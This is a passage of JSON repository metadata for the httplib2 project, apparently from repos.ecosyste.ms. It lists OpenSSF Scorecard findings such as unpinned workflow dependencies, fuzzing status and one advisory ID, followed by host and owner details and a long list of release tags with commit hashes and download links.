https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2